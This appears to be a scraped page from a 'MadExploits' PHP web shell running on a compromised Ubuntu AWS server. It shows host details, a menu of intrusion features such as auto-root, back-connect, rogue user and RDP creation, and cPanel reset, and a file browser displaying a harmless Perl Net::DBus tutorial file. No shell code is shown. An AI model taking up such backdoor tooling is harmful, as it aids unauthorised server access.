Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 13.59.196.41
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
x86_64-linux-gnu /
perl5 /
5.30 /
Net /
DBus /
[ HOME SHELL ]
Name
Size
Permission
Action
Binding
[ DIR ]
drwxr-xr-x
Test
[ DIR ]
drwxr-xr-x
Tutorial
[ DIR ]
drwxr-xr-x
ASyncReply.pm
4.21
KB
-rw-r--r--
Annotation.pm
3.22
KB
-rw-r--r--
BaseObject.pm
20.86
KB
-rw-r--r--
Callback.pm
3.55
KB
-rw-r--r--
Dumper.pm
6.06
KB
-rw-r--r--
Error.pm
3.67
KB
-rw-r--r--
Exporter.pm
17.24
KB
-rw-r--r--
Object.pm
6.47
KB
-rw-r--r--
ProxyObject.pm
7.07
KB
-rw-r--r--
Reactor.pm
18.54
KB
-rw-r--r--
RemoteObject.pm
14.97
KB
-rw-r--r--
RemoteService.pm
4.82
KB
-rw-r--r--
Service.pm
3.25
KB
-rw-r--r--
Tutorial.pod
1.91
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Tutorial.pod
# -*- perl -*- # # Copyright (C) 2004-2005 Daniel P. Berrange # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # # $Id: Tutorial.pod,v 1.2 2006/02/03 13:34:18 dan Exp $ =pod =head1 NAME Net::DBus::Tutorial - tutorials on the Perl DBus APIs =head1 DESCRIPTION This section includes tutorials on the Perl DBus APIs. Current topics include providing a service, by exporting objects to the bus, and accessing a service, by calling objects on the bus. =over 4 =item L<Net::DBus::Tutorial::ExportingObjects> This tutorial covers how to provide a service to the bus by exporting objects. The topics covered include basics of creating objects and methods, emitting signals, exporting properties, registering services for automatic activation. =item L<Net::DBus::Tutorial::UsingObjects> This tutorial cover how to use a service provided on the bus by another application. The topics covered include the basics of calling methods on remote objects, explicitly calling methods in particular interfaces, listening for signals. NB This tutorial is yet to be written. =back =head1 SEE ALSO L<Net::DBus>, L<Net::DBus::Object>, L<Net::DBus::RemoteObject>, L<http://freedesktop.org/> =head1 AUTHORS Daniel P. Berrange L<mailto:dan@berrange.com> =head1 COPYRIGHT Copyright 2005 Daniel P. Berrange =cut
Close